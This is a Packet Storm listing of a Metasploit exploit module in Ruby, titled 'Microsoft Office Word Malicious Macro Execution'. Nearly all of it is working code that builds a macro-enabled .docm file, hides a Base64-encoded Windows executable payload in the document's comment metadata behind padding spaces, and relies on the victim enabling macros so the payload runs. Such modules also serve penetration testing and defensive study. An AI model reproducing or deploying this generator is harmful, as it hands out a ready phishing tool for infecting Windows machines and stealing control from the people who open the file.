Microsoft Office Word Malicious Macro Execution

2017-02-08T00:00:00
ID PACKETSTORM:140972
Type packetstorm
Reporter sinn3r
Modified 2017-02-08T00:00:00

Description

                                        
                                            `##  
# This module requires Metasploit: http://metasploit.com/download  
# Current source: https://github.com/rapid7/metasploit-framework  
##  
  
require 'msf/core'  
require 'rex/zip'  
  
class MetasploitModule < Msf::Exploit::Remote  
Rank = ExcellentRanking  
  
include Msf::Exploit::FILEFORMAT  
include Msf::Exploit::EXE  
  
def initialize(info={})  
super(update_info(info,  
'Name' => "Microsoft Office Word Malicious Macro Execution",  
'Description' => %q{  
This module generates a macro-enabled Microsoft Office Word document. The comments  
metadata in the data is injected with a Base64 encoded payload, which will be  
decoded by the macro and execute as a Windows executable.  
  
For a successful attack, the victim is required to manually enable macro execution.  
},  
'License' => MSF_LICENSE,  
'Author' =>  
[  
'sinn3r' # Metasploit  
],  
'References' =>  
[  
['URL', 'https://en.wikipedia.org/wiki/Macro_virus']  
],  
'DefaultOptions' =>  
{  
'EXITFUNC' => 'thread',  
'DisablePayloadHandler' => true  
},  
'Platform' => 'win',  
'Targets' =>  
[  
['Microsoft Office Word', {}],  
],  
'Privileged' => false,  
'DisclosureDate' => "Jan 10 2012",  
'DefaultTarget' => 0  
))  
  
register_options([  
OptString.new("BODY", [false, 'The message for the document body', '']),  
OptString.new('FILENAME', [true, 'The Office document macro file', 'msf.docm'])  
], self.class)  
end  
  
  
def on_file_read(short_fname, full_fname)  
buf = File.read(full_fname)  
  
case short_fname  
when /document\.xml/  
buf.gsub!(/DOCBODYGOESHER/, datastore['BODY'])  
when /core\.xml/  
b64_payload = ' ' * 55  
b64_payload << Rex::Text.encode_base64(generate_payload_exe)  
buf.gsub!(/PAYLOADGOESHERE/, b64_payload)  
end  
  
# The original filename of __rels is actually ".rels".  
# But for some reason if that's our original filename, it won't be included  
# in the archive. So this hacks around that.  
case short_fname  
when /__rels/  
short_fname.gsub!(/\_\_rels/, '.rels')  
end  
  
yield short_fname, buf  
end  
  
  
def package_docm(path)  
zip = Rex::Zip::Archive.new  
  
Dir["#{path}/**/**"].each do |file|  
p = file.sub(path+'/','')  
  
if File.directory?(file)  
print_status("Packaging directory: #{file}")  
zip.add_file(p)  
else  
on_file_read(p, file) do |fname, buf|  
print_status("Packaging file: #{fname}")  
zip.add_file(fname, buf)  
end  
end  
end  
  
zip.pack  
end  
  
  
def exploit  
print_status('Generating our docm file...')  
path = File.join(Msf::Config.install_root, 'data', 'exploits', 'office_word_macro')  
docm = package_docm(path)  
file_create(docm)  
super  
end  
  
end  
`